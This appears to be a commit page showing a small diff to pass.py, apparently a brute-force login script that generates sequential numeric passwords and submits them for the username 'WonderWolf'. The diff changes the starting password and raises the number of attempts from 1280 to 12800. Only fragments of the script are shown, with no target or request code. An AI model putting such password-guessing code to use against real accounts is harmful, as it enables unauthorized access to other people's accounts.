asv7j commited on
Commit
c98a3ed
·
verified ·
1 Parent(s): 76db2f9

Update pass.py

Browse files
Files changed (1) hide show
  1. pass.py +2 -2
pass.py CHANGED
@@ -30,7 +30,7 @@ def send_login(username, number_of_attempts):
30
  return charset[0] + current
31
 
32
  # Start password
33
- password = '999999'
34
  passwords = [password]
35
 
36
  for _ in range(number_of_attempts - 1):
@@ -44,7 +44,7 @@ start = time.time()
44
 
45
  # Example usage
46
  username = 'WonderWolf' # Replace with actual username
47
- number_of_attempts = 1280 # Set the number of password attempts
48
  send_login(username, number_of_attempts)
49
  end = time.time()
50
  print(end - start)
 
30
  return charset[0] + current
31
 
32
  # Start password
33
+ password = '998861'
34
  passwords = [password]
35
 
36
  for _ in range(number_of_attempts - 1):
 
44
 
45
  # Example usage
46
  username = 'WonderWolf' # Replace with actual username
47
+ number_of_attempts = 12800 # Set the number of password attempts
48
  send_login(username, number_of_attempts)
49
  end = time.time()
50
  print(end - start)